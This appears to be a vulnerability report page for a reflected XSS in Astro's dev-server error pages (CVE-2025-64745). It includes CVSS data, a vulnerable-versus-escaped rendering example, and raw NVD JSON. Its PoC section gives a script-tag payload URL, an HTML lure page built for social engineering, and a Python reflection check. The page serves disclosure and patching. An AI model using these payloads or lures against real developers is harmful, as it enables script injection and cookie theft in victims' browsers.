Security Vulnerability Report
CVE-2025-64745 CVSS 2.7 LOW

CVE-2025-64745

Published: 2025-11-13 21:15:54
Last Modified: 2025-11-25 15:13:15

Description

Astro is a web framework. Starting in version 5.2.0 and prior to version 5.15.6, a Reflected Cross-Site Scripting (XSS) vulnerability exists in Astro's development server error pages when the `trailingSlash` configuration option is used. An attacker can inject arbitrary JavaScript code that executes in the victim's browser context by crafting a malicious URL. While this vulnerability only affects the development server and not production builds, it could be exploited to compromise developer environments through social engineering or malicious links. Version 5.15.6 fixes the issue.
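To make the description concrete, the following is a minimal model of the bug class, added as an example for this page. It is not Astro's code (the affected template is packages/astro/src/template/4xx.ts, linked under References); the function names, the template wording and the sample path are hypothetical. The vulnerable renderer splices the requested pathname straight into the error page HTML; the hardened renderer passes every untrusted value through an HTML escaper, which is the standard fix for this class. The hint page is only produced when the request path disagrees with the configured `trailingSlash` value ('always' or 'never'), which is why that option is a precondition for reaching the sink.

```javascript
// Added example for CVE-2025-64745: a toy dev-server "trailing slash" error page.
// Not Astro's code; names, template text and sample input are hypothetical.

// Decide whether the dev server would answer with the hint page at all: only a
// path that disagrees with the trailingSlash setting triggers it, so a project
// using the default 'ignore' never reaches the vulnerable template.
function needsTrailingSlashHint(pathname, trailingSlash) {
  if (pathname === '/') return false;
  const hasSlash = pathname.endsWith('/');
  return (trailingSlash === 'always' && !hasSlash) ||
         (trailingSlash === 'never' && hasSlash);
}

// The "did you mean" URL the hint offers: add or strip the trailing slash.
function expectedPath(pathname, trailingSlash) {
  return trailingSlash === 'always' ? `${pathname}/` : pathname.replace(/\/+$/, '');
}

// Vulnerable renderer: the attacker-controlled pathname lands in the HTML
// verbatim, so /<script>...</script> becomes live markup on the dev origin.
function renderTrailingSlashHintVulnerable(pathname, trailingSlash) {
  const expected = expectedPath(pathname, trailingSlash);
  return `<!doctype html><html><body>
<h1>404: Not found</h1>
<p>The request path <code>${pathname}</code> does not match
<code>trailingSlash: '${trailingSlash}'</code>.
Did you mean <a href="${expected}">${expected}</a>?</p>
</body></html>`;
}

// Minimal HTML escaper covering text nodes and double/single-quoted attributes.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Hardened renderer: identical page, but every value derived from the request
// is escaped before it is interpolated. trailingSlash comes from the developer's
// own config, not from the request, so it is left as-is here.
function renderTrailingSlashHintFixed(pathname, trailingSlash) {
  const safePath = escapeHtml(pathname);
  const safeExpected = escapeHtml(expectedPath(pathname, trailingSlash));
  return `<!doctype html><html><body>
<h1>404: Not found</h1>
<p>The request path <code>${safePath}</code> does not match
<code>trailingSlash: '${trailingSlash}'</code>.
Did you mean <a href="${safeExpected}">${safeExpected}</a>?</p>
</body></html>`;
}

// Constructed sample: the decoded form of the path used in the PoC on this page.
const SAMPLE_PATH = '/<script>alert(document.cookie)</script>';
const SAMPLE_PAYLOAD = '<script>alert(document.cookie)</script>';

// Run both renderers against the sample and report what each reflects.
function demo() {
  const vuln = renderTrailingSlashHintVulnerable(SAMPLE_PATH, 'always');
  const fixed = renderTrailingSlashHintFixed(SAMPLE_PATH, 'always');
  return {
    hintShown: needsTrailingSlashHint(SAMPLE_PATH, 'always'),
    vulnerableReflectsScript: vuln.includes(SAMPLE_PAYLOAD),
    fixedReflectsScript: fixed.includes('<script>'),
    fixedEscaped: fixed.includes('&lt;script&gt;alert(document.cookie)&lt;/script&gt;'),
  };
}

console.log(demo());
```

The same check is what the Python PoC below performs from the outside: a vulnerable server returns the raw payload in the error page body, a patched one returns it entity-encoded.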

CVSS Details

CVSS Score
2.7 (GitHub CNA, secondary) / 6.1 (NVD, primary)
Severity
LOW (GitHub CNA) / MEDIUM (NVD)
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N (GitHub CNA; exploitability 1.0, impact 1.4)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N (NVD; exploitability 2.8, impact 2.7)
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting")

The headline 2.7 LOW is the CNA's score; the raw JSON below also carries NVD's 6.1 MEDIUM. The two vectors disagree on attack vector (Local vs Network), attack complexity (High vs Low) and integrity impact (None vs Low), and agree that user interaction is required and that scope changes (the injected script runs in the developer's browser on the dev-server origin, not in the server process). A dev server bound to localhost is still reachable from any page open in the same browser, which is exactly the social-engineering path the description names, so the NVD vector is the one to plan around for developers who can be lured to a link.

Configurations (Affected Products)

cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:* - VULNERABLE
Astro >= 5.2.0, < 5.15.6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- CVE-2025-64745 PoC: Reflected XSS in Astro development server error pages -->
<!-- Precondition: the target project sets trailingSlash in astro.config to a value other than
     the default 'ignore' (i.e. 'always' or 'never'), so that a request whose path disagrees with
     that setting is answered by the dev-server error page that reflects the path. -->
<!-- Example malicious URL (angle brackets percent-encoded so the link survives the browser's URL parser): -->
<!-- http://localhost:4321/%3Cscript%3Ealert(document.cookie)%3C/script%3E -->
<!-- HTML lure page, delivered via social engineering; it opens the dev-server URL in the developer's browser. -->
<html>
<body>
<h2>CVE-2025-64745 PoC</h2>
<p>Click the link below to trigger the XSS vulnerability:</p>
<a href="http://localhost:4321/%3Cscript%3Ealert(document.cookie)%3C/script%3E" target="_blank">Click me (Malicious Link)</a>
<!-- Entity-encoded so the lure page displays the URL instead of executing its own payload -->
<p>Or visit directly: http://localhost:4321/&lt;script&gt;alert('XSS')&lt;/script&gt;</p>
</body>
</html>

python
# CVE-2025-64745 PoC: check whether a local Astro dev server reflects the request path unescaped
import requests

target = "http://localhost:4321"
xss_payload = "<script>alert(document.cookie)</script>"
# requests percent-encodes the angle brackets in the path before sending;
# the dev server decodes the path again when it builds the error page.
malicious_url = f"{target}/{xss_payload}"

print(f"[*] Sending malicious request to: {malicious_url}")
response = requests.get(malicious_url)
print(f"[*] Response status: {response.status_code}")
# A vulnerable dev server (>= 5.2.0, < 5.15.6, trailingSlash set) returns the error page with
# the raw payload; a patched server (>= 5.15.6) returns it HTML-escaped, so this prints False.
print(f"[*] XSS payload reflected in response: {xss_payload in response.text}")

References

https://github.com/withastro/astro/security/advisories/GHSA-w2vj-39qv-7vh7 (Exploit, Third Party Advisory)
https://github.com/withastro/astro/commit/790d9425f39bbbb462f1c27615781cd965009f91 (Patch)
https://github.com/withastro/astro/pull/12994 (Patch)
https://github.com/withastro/astro/blob/5bc37fd5cade62f753aef66efdf40f982379029a/packages/astro/src/template/4xx.ts#L133-L149 (Product: the affected error-page template)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64745", "sourceIdentifier": "security-advisories@github.com", "published": "2025-11-13T21:15:54.240", "lastModified": "2025-11-25T15:13:14.937", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Astro is a web framework. Starting in version 5.2.0 and prior to version 5.15.6, a Reflected Cross-Site Scripting (XSS) vulnerability exists in Astro's development server error pages when the `trailingSlash` configuration option is used. An attacker can inject arbitrary JavaScript code that executes in the victim's browser context by crafting a malicious URL. While this vulnerability only affects the development server and not production builds, it could be exploited to compromise developer environments through social engineering or malicious links. Version 5.15.6 fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "security-advisories@github.com", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.0, "impactScore": 1.4}, {"source": "nvd@nist.gov", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "security-advisories@github.com", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:astro:astro:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "5.2.0", "versionEndExcluding": "5.15.6", "matchCriteriaId": "2EE0E141-B44E-460F-BB2E-0FBF0D7B6E43"}]}]}], "references": [{"url": "https://github.com/withastro/astro/blob/5bc37fd5cade62f753aef66efdf40f982379029a/packages/astro/src/template/4xx.ts#L133-L149", "source": "security-advisories@github.com", "tags": ["Product"]}, {"url": "https://github.com/withastro/astro/commit/790d9425f39bbbb462f1c27615781cd965009f91", "source": "security-advisories@github.com", "tags": ["Patch"]}, {"url": "https://github.com/withastro/astro/pull/12994", "source": "security-advisories@github.com", "tags": ["Patch"]}, {"url": "https://github.com/withastro/astro/security/advisories/GHSA-w2vj-39qv-7vh7", "source": "security-advisories@github.com", "tags": ["Exploit", "Third Party Advisory"]}]}}